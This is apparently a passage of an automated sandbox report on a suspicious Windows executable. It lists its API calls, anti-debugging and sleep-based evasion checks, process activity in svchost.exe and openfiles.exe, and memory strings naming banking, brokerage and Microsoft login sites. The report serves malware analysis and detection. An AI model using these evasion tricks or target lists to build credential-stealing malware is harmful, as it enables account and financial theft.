            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_002055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_002055FD
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001A33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_001A33C7
            Source: C:\Users\user\Desktop\F2024-202202.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\openfiles.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\openfiles.exe Window / User API: threadDelayed 5408
            Source: C:\Windows\SysWOW64\openfiles.exe Window / User API: threadDelayed 4563
            Source: C:\Users\user\Desktop\F2024-202202.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-99846
            Source: C:\Users\user\Desktop\F2024-202202.exe API coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 1.3 %
            Source: C:\Windows\SysWOW64\openfiles.exe API coverage: 2.5 %
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 6096 Thread sleep count: 5408 > 30
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 6096 Thread sleep time: -10816000s >= -30000s
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 6096 Thread sleep count: 4563 > 30
            Source: C:\Windows\SysWOW64\openfiles.exe TID: 6096 Thread sleep time: -9126000s >= -30000s
            Source: C:\Windows\SysWOW64\openfiles.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001E4696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_001E4696
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001EC93C FindFirstFileW,FindClose, 0_2_001EC93C
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_001EC9C7
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001EF200
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001EF35D
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_001EF65E
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_001E3A2B
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_001E3D4E
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_001EBF27
            Source: C:\Windows\SysWOW64\openfiles.exe Code function: 5_2_0014D4E0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0014D4E0
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_00184AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00184AFE
            Source: HCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3253774022.00000000008B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
            Source: 2y9KZy13.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 2y9KZy13.5.dr Binary or memory string: discord.comVMware20,11696428655f
            Source: 2y9KZy13.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 2y9KZy13.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 2y9KZy13.5.dr Binary or memory string: global block list test formVMware20,11696428655
            Source: 2y9KZy13.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 2y9KZy13.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 2y9KZy13.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 2y9KZy13.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 2y9KZy13.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 2y9KZy13.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 2y9KZy13.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 2y9KZy13.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 2y9KZy13.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 2y9KZy13.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 2y9KZy13.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 2y9KZy13.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 2y9KZy13.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 2y9KZy13.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 2y9KZy13.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 2y9KZy13.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 2y9KZy13.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 2y9KZy13.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 2y9KZy13.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 2y9KZy13.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 2y9KZy13.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 2y9KZy13.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: firefox.exe, 00000009.00000002.2682019916.0000026B03A8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssDNP
            Source: 2y9KZy13.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 2y9KZy13.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 2y9KZy13.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 2y9KZy13.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\F2024-202202.exe API call chain: ExitProcess graph end node graph_0-98432
            Source: C:\Users\user\Desktop\F2024-202202.exe API call chain: ExitProcess graph end node graph_0-98621
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\openfiles.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00419023 LdrLoadDll, 2_2_00419023
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001F41FD BlockInput, 0_2_001F41FD
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_00183B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00183B4C
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001B5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_001B5CCC
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001FC304 LoadLibraryA,GetProcAddress, 0_2_001FC304
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_01403540 mov eax, dword ptr fs:[00000030h] 0_2_01403540
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_014035A0 mov eax, dword ptr fs:[00000030h] 0_2_014035A0
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_01401ED0 mov eax, dword ptr fs:[00000030h] 0_2_01401ED0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h] 2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h] 2_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h] 2_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0350634F mov eax, dword ptr fs:[00000030h] 2_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h] 2_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h] 2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h] 2_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h] 2_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h] 2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h] 2_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h] 2_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h] 2_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h] 2_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h] 2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h] 2_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h] 2_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034663FF mov eax, dword ptr fs:[00000030h] 2_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h] 2_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h] 2_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h] 2_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h] 2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h] 2_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0350625D mov eax, dword ptr fs:[00000030h] 2_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h] 2_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03436259 mov eax, dword ptr fs:[00000030h] 2_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h] 2_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h] 2_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342826B mov eax, dword ptr fs:[00000030h] 2_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h] 2_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342823B mov eax, dword ptr fs:[00000030h] 2_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h] 2_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h] 2_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h] 2_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h] 2_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h] 2_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h] 2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h] 2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h] 2_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h] 2_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h] 2_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h] 2_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03504164 mov eax, dword ptr fs:[00000030h] 2_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h] 2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h] 2_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
